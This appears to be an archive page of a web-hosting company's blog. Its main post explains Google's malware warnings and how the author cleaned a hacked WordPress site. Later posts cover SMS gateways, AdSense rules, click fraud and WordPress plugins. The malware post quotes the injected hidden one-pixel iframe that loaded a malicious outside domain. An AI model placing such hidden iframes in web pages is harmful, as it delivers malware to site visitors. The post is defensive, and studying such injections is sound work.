Archive for the ‘Security Issue’ category

Solution for ‘This site may harm your computer’ Message

September 21st, 2010

Solution for ‘This site may harm your computer’ Message

We run a web hosting company and recently we noticed many customers completing acting weird with the following messages in google search results and when they access it. When they do a site:mywebsite.com search in google, they get a message below the search result stating that ‘This site may harm your computer.’ which is making lose visitors, apart from which many peoples not able to access website. What may be the problem, because when they try to visit website they get a message stating that – ‘Reported Attack Site!’ and it says that my website is trying to install programs which can steal private information or damage the visitors computers but they run a genuine information website and have no downloads nor any illegal material. What may be the solution for this problem and website hacked? – Question by a Reader through Phone

First of all you need to understand that these are some badware warning against malicious software which is given by Google through stopbadware.org which warns all the google searchers against visiting websites which can be harmful to them. You need to detect malware and also visit the google safe browsing section which lists all the information about different websites and if they were listed as suspicious in the last 90days.

Reported Attack Website – Harmful Content

Sometimes because of some wrong permissions on your website scripts like wordpress or when you have easy passwords for your FTP accounts, your websites can be compromised after which these hackers would add some malicious links within your content or in the footer section using direct links with visibility=0 or else using iFrames. You need to continuously make sure that your websites content is secure and you have no links placed by the hackers anywhere on your ftp.

Read this wordpress security guide which can give you some important points you need to make note of while running a blog and also here are some plugins which you need to run on your wordpress blog to make sure you can regularly scan for the content of your blog and all he plugin files and theme files.


Harmful Websites Google Warning

Our Experience :
Recently after making a quick check on our website, we found that there were some iframe codes added to our website homepage which we could not detect. So because of this for many customer our website was not  accessible the website with a virus message.  Many antivirus software even removed the virus from user which got downloaded, and then user recieved the following message :

HTTP filter file http://www.emailloop.net  PDF/Exploit.Pidief.OJS.Gen trojan connection terminated – quarantined  Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.

When we review our site we found the following iframe added to the files at the end which is the reason the homepage was continiously loading like a loop and was also breaking the theme files, though as a normal user anyone cannot find out this malicious code in the blog, unless the antivirus softwares can find them.

<iframe src=”http://brugeni.net/?click=44E729″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

Solution for Removing the iFrames :
There are several wordpress plugins which can help you stay secure by checking all the file permissions, blog content and your ftp files. Here are few recommendations :

* WP Security Scan -
Scans your WordPress installation for security vulnerabilities and suggests corrective actions. You need to install this plugin in your wordpress blog and then activate it, following which you will find a complete new menu called as ‘WP – Security Admin Tools’ where you can find all the System Information & links to scanner where you can find all the current permissions of the files under your root folder and the permissions you need to change for more security.
-passwords
-file permissions
-database security
-version hiding
-WordPress admin protection/security
* Secure WP Plugin
This plugin is very useful because it does a lot of stuff by creating some pages which can be accessed by others and removing info from your website which should not be allowed to be accessed by others.

# removes error-information on login-page
# adds index.html to plugin-directory (virtual)
# removes the wp-version, except in admin-area
# removes Really Simple Discovery
# removes Windows Live Writer
# remove core update information for non-admins
# remove plugin-update information for non-admins

Steps to Remove the Warning :
Once the warning is shown for your website, expect 0% visitors for your website from Google because the warning message will block the visitors from entering into the site. You need to get this warning removed by Google as soon as possible and for this the very first step would be to remove the malicious links, hackers codes or any other stuff which was the cause of this warning. Once you are sure that you have found the problem and removed those codes you need to proceed to the next step of contacting Google.

Login to your Google Webmaster tools account which is also useful for regaining google rankings. You need to make sure you have added your website in the Webmaster Tools by confirming that you are owner by adding the ‘Meta’ code or uploading a file which it offers you. Once this is done you need to perform the following 3 steps and wait for Google Webmaster Team to review your website and confirm that your website does not distribute badware or hosts it.

1. On the Webmaster Tools Home page, select the site you want.
2. In the Parts of this site may be distributing malware message, click More details.
3. Click Request a review.

Previously it used to take a lot of time for this procedure but nowadays within 2-3days time frame the websites are reviewed and the warning is removed.  Let me know if you have any questions about this problem and if your website is attacked with any of this kind of problems.

Read more  Iframe / Virus in Website Pages, How to Fix Iframe issue

SMS Applications

May 5th, 2010

SMS Gateway – Creative Web Designers can manage simultaneous connections to one or more SMSCs, supporting the major SMSC protocols, including SMPP, UCP/EMI, CIMD2, HTTP, and/or GSM modems. Creative Web Designers handles the low level protocol details, and makes it easy to switch between different providers, as well as making it easy to add additional connections for situations where it is advantageous to route messages for different countries via different providers.

Creative Web Designers offers simple SMS gateway connectivity for those who need to SMS-enable their systems, websites, or applications. Using Creative Web Designers API (Application Programming Interface) integration is fast, simple and reliable.
Our API is immediately multicast messaging enabled, allowing integration to any front-end or legacy system, with a direct connection into Creative Web Designers global gateways.
Learn more about each of our API connectivity options below:

* HTTP/S API
Our most popular connection, HTTP is one of the simpler forms of communication to the Creative Web Designers API. It is used in the form of an HTTP/Internet Post.
* SMTP [E-mail to SMS] API
Another firm favourite, the SMTP API allows messages that are sent via e-mail to be converted to SMS. Popular with customers who already have an e-mail messaging system in place.
* SMPP API
Our most robust connection, suitable for customers who send large volumes of traffic. Creative Web Designers offers a global SMPP connection using the SMPP 3.3 standard. Customers are required to have SMPP client software in place, and unlike our other APIs there are minimum volume requirements when using SMPP.
* XML API
If you are familiar with XML, Creative Web Designers offers an XML interface with its own set of DTDs. Currently supports XML over HTTP.
* FTP API
Suitable for once off, high volume messaging. The FTP upload facility allows customers to upload text files to Creative Web Designers FTP site, and have the files automatically dispatched to message recipients.
* COM Object API
Popular with windows-based developers, the Creative Web Designers COM API object’s rich set of methods and definitions make it easy for a user to integrate SMS sending into their programs or ASP pages.

http://www.version-next.com/bulk-sms/index.html

Benefits of SMS GatewaySMS Applications

May 5th, 2010

SMS Gateway – Creative Web Designers can manage simultaneous connections to one or more SMSCs, supporting the major SMSC protocols, including SMPP, UCP/EMI, CIMD2, HTTP, and/or GSM modems. Creative Web Designers handles the low level protocol details, and makes it easy to switch between different providers, as well as making it easy to add additional connections for situations where it is advantageous to route messages for different countries via different providers.

Creative Web Designers offers simple SMS gateway connectivity for those who need to SMS-enable their systems, websites, or applications. Using Creative Web Designers API (Application Programming Interface) integration is fast, simple and reliable.
Our API is immediately multicast messaging enabled, allowing integration to any front-end or legacy system, with a direct connection into Creative Web Designers global gateways.
Learn more about each of our API connectivity options below:

  • HTTP/S API
    Our most popular connection, HTTP is one of the simpler forms of communication to the Creative Web Designers API. It is used in the form of an HTTP/Internet Post.
  • SMTP [E-mail to SMS] API
    Another firm favourite, the SMTP API allows messages that are sent via e-mail to be converted to SMS. Popular with customers who already have an e-mail messaging system in place.
  • SMPP API
    Our most robust connection, suitable for customers who send large volumes of traffic. Creative Web Designers offers a global SMPP connection using the SMPP 3.3 standard. Customers are required to have SMPP client software in place, and unlike our other APIs there are minimum volume requirements when using SMPP.
  • XML API
    If you are familiar with XML, Creative Web Designers offers an XML interface with its own set of DTDs. Currently supports XML over HTTP.
  • FTP API
    Suitable for once off, high volume messaging. The FTP upload facility allows customers to upload text files to Creative Web Designers FTP site, and have the files automatically dispatched to message recipients.
  • COM Object API
    Popular with windows-based developers, the Creative Web Designers COM API object’s rich set of methods and definitions make it easy for a user to integrate SMS sending into their programs or ASP pages.
  • http://www.version-next.com/bulk-sms/index.html

21 Common Mistakes that Violate Google Adsense TOS

July 14th, 2009

You don’t have time to read all the Terms & Conditions at adsense site? But it’s important to have a look at all of them to avoid your account blocking from Adsense program. Don’t worry I will take you through all the important tos within 2min of time.

Following are the common mistakes people do knowingly or unknowingly which causes for their account blocking. So I can assure you that after reading all these you will be safe enough all the time.

  1. Never click your own Adsense ads or get them clicked for whatever reason
  2. Never change the Adsense code
  3. Do not place more than 3 ad units and 3 ad links or 2 Adsense search boxes on any web page
  4. Do not run competitive contextual text ad or search services on the same site
  5. Do not disclose confidential information
  6. Label headings as “sponsored links” or “advertisements” only
  7. Never launch a new Page for clicked ads by default
  8. One Account suffices for Multiple websites
  9. Place ads only on Content Pages
  10. Do not mask ad elements
  11. Do not send your ads by email
  12. Keep track of your content
  13. Do not alter the results after ad clicks or searches
  14. Avoid excessive advertising and keyword stuffing
  15. Ensure you Language is Supported
  16. Maximum 2 referral button per product per page
  17. Do not specify Google ads as your alternate ads
  18. Do not confuse with adjacent images
  19. Never ask some one online to click your ads
  20. Don’t reproduce copyright content to your site. Because of this there may be chance of account block if that author complaint against you.
  21. Don’t place any information like “Please click this ad and help someone” or etc… content like this.

How Much Should you Pay for a Paid Writer?

July 13th, 2009

This is always a difficult question to answer in blogging world. What exactly they expect per article? How they estimate the price? At the end how much you need to pay? All the questions got their own variable answers. So, we can’t define the single answer here. But we can discuss the points which can make difference in the calculation. Here we go then…

Estimating the price per article depends on many factors. So let’s discuss those here…

writer Experience: This makes all the difference in pricing. If you hire experienced people, then obviously you need to pay more and you’ll get quality out of it. Again here are some points where you need to concentrate

  • Writing experience
  • Niche experience

Writing experience is different than real time or niche experience. The writer should be experienced in the niche which you are in.

Writers Track Record: This is very important factor in price estimation. Find where else the writer is working and look at his previous articles. And look at the response he got. If possible contact that site owner and enquire about the writer skills and behavior.

Word count: Article just about the given topic or article with in & out of the topic makes the difference in price and quality. If it is just a sneak peak then you don’t need to pay much. If you want in & out of the topic, then writer need to do more research on the topic. You can pay more in this scenario.

Honesty: So many bad dogs are wandering around the web. They just copy the content, change it and publish it somewhere or sell it. You need concentrate more here to catch those dogs.

Punctuality: This is very important in blogging niche. Posting should follow a standard frequency. Your agreement should talk about, how many posts per month and what’s the frequency.

Finally pricing depends upon the writer and the communication between you and writer. It’s always good to experiment with new comers, who can serve for less.

Can I Block Your AdSense Account? Yes, I Can! Sharing How?

July 13th, 2009

Are you a good blogger? Are you my competitor? Earning more than me? If yes to all, I don’t like you. Yes I don’t like you to stay in this online market. I want to pull you down. See how I will do that!

Not me, anyone can pull you down with the help of weapon called click fraud. Obviously everyone will use some ad networks like adsense to earn money. Who doesn’t nowadays? According to a online survey 68% of website owners don’t know much about this click fraud. I don’t want you to sit in that 68%. So let’s talk about this…

Click fraud is one of the Latest bits of thuggery to hit the online world. Like spam or viruses, click fraud can cause serious damage. Even more some time!

What is click fraud and why is it on the rise?

Click fraud is defined as someone who clicks on a paid ad with the intent of clicking rather than because of interest in goods or services. Advertisers are the first victims here as they lose the money with pay per click rule and didn’t get any lead or real click in return to the money they spend.

Then secondly website owners are the victims from this fraud clicking as their account will be blocked by ad networks without any reasons/explanations. Google takes this click fraud very serious and even they don’t give you the reasons why your AdSense account got blocked.

Sadly, click fraud is the price of the Web’s success. In rather short order, Internet advertising, including search engine marketing, has gone from a dot-com joke to nearly a $10 billion business, according to Price waterhouse Coopers-A US based financial auditing company.

Who are these click-fraud artists? Typically, these people are known to you.

  • Your competitors: Very dangerous people, who can do anything to drag you down. They can click on your keyword ads continuously which may lead to a ban from ad networks.
  • Automated Programmers: Sadist people, who enjoys you pain. They will invest their programming skills to announce win on web. They can run a software bot on you site which can rack up thousands of clicks per hour.
  • Paid clickers: Who doesn’t know that they are doing something illegal to earn. Times of India (News agency) recently reported on Indian housewives and college students who are earning up to $200 a month clicking on ads for a few hours a day, without really knowing its fraud.
  • Small scale website owners: A small scale blog owner who wants to earn fast money will create a community around the people. The community is intended to participate in click exchange programs to earn money.

Advertisers & Ad agencies investing lots of money to detect this click fraud. But how will you survive as a website/blog owner. How will you escape from account blockages?

That part I planned to cover in my next article with all the details. How many of you know about this Click Fraud? Share with us! Happy Blogging!

Themes

July 13th, 2009

All the themes here are for free download. All Demos and Downloads will be redirected to respective theme owner’s sites and subject to their copyrights. Please visit respective author’s site for more details on themes and copyrights.

wordpress Themes are here:

Blogspot Themes are here:

WordPress Plugins are here:

How WordPress Makes Money? and What it Offers?

July 13th, 2009

How wordpress does make money? This is my long time doubt. I searched throughout the web but did find answer till now. Matt (WP founder) recently travelled to India for an event (WordCamp) and he had interaction with the bloggers there.

Someone asked this question to WordPress founder Matt at WordCamp India. First he surprised and then answered that Automattic (Company that made WP and other products) is profitable.

Amit of labnol.org attended the camp and he shared this funny & important discussion on his blog. He explained all the products which earn money for Automattic Company. As a beginner you’re using all the products like WordPress and Akismet for free right? But once your blog start earning, you need to pay for the services. Yes, let me give you some bullet point of it.

  • Blog Hosting: WordPress offers blog hosting services at $500 per month to big publishers.
  • Google adsense: Free blogs hosted on WordPress.com may sometimes carry Google ads
  • Akismet: If you maintain a business blog, you need to pay $50 per month
  • Poll Daddy: Free poll daddy supports only double digit voting. You need to buy a paid version if you want extended features in it.

WordPress Products List: Most of the WordPress users don’t know how many products they are offering for free. Here is the detailed list of their products.

  1. WordPress.com: Famous open source WordPress package with 5-minute install
  2. Akismet: spam protection service that has proven highly effective, blocking millions of spams a day with a 0.001% miss rate.
  3. BBPress: Famous and free Forum software
  4. IntenseDebate: Comment system that enhances and encourages discussion on your blog
  5. PollDaddy: Free & premier way to create polls and surveys on the web
  6. Gravatar: A gravatar (globally recognized avatar) is quite simply an image that appears when you comment.
  7. Buddy Press: Buddy Press will extend WordPress MU, bringing social networking features to your blog
  8. WordPress for iPhone: The first Open Source blogging app for iPhone and iPod touch
  9. Themes: Free and Premium WordPress themes
  10. Plugins: Free plugins for your WP blogs

Protect Your WP Blog from Password Hackers

July 13th, 2009

One of the most popular passwords hacking method is Trial & error. The first method which comes into hackers mind is this. That’s the reason banking applications uses a security breach to block the account if a user fails for 3 or 5 times. How to implement this in your wordpress blog? Here comes the plugin into picture to help you out…

login LockDown is the plugin which can do this task for you. It records the IP of the user and records the number of failed login attempts. It will block the IP when specified condition meets, like 3 attempts in 5 or 10 minutes. You can release the blocked IP’s later manually.

What Exactly Google Penalty is? How to Prevent it?

July 13th, 2009

Google loves people who follow their tos and always rank them high but what about the people who don’t care about them? The answer is simple; they penalize or ban them for their misbehavior towards them.

Now what is Google penalty and Ban?

Google penalty is the process of removing top ranked web pages in the search results, for certain keyword search, done in Google. This is also often known as lowering the rank of the web page for certain time period. The time period varies from 1 month to 12 months depending on the penalty. Penalized pages are not permanently removed from Google’s index but they are kept away for some period.

Google Ban is just like kiss of death. The Google ban generally removes off, all web pages permanently from Google search results or search index.  Google basically bans website or blogs that try to trick Google to attain high page rank in short period of time by getting huge number of inbound links.

PHP Freelancer